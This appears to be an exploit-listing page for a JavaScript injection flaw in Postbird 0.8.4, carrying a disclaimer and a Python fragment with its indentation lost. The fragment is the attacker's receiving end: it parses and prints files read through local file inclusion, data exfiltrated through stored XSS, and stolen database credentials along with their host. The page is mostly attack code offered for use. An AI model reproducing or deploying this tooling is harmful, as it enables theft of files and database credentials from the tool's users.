Exploits / Vulnerability Discovered : 2021-05-27 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Postbird 0.8.4 javascript injection is for educational purposes only and if it is used you will do on your own risk!
if attr[2:len(attr)-1] == 'file':
data = data[12:len(data)-11]
data = data.rsplit('\\n')
print(f'\n[+] File received from LFI: \n\n')
for output in data:
print(output)
elif attr[2:len(attr)-1] == 'xss':
data = data[11:len(data)-10]
print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
elif attr[2:len(attr)-1] == 'credentials':
pos = re.search('{"\S+:', data)
data = data[pos.start():len(data)-11]
for i in range(2, len(data), 1):
if data[i] == '"':
pos = i
break
host = data[2:pos]
data = data[14:]
data = data.rsplit(',')
print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
for output in data:
print(output)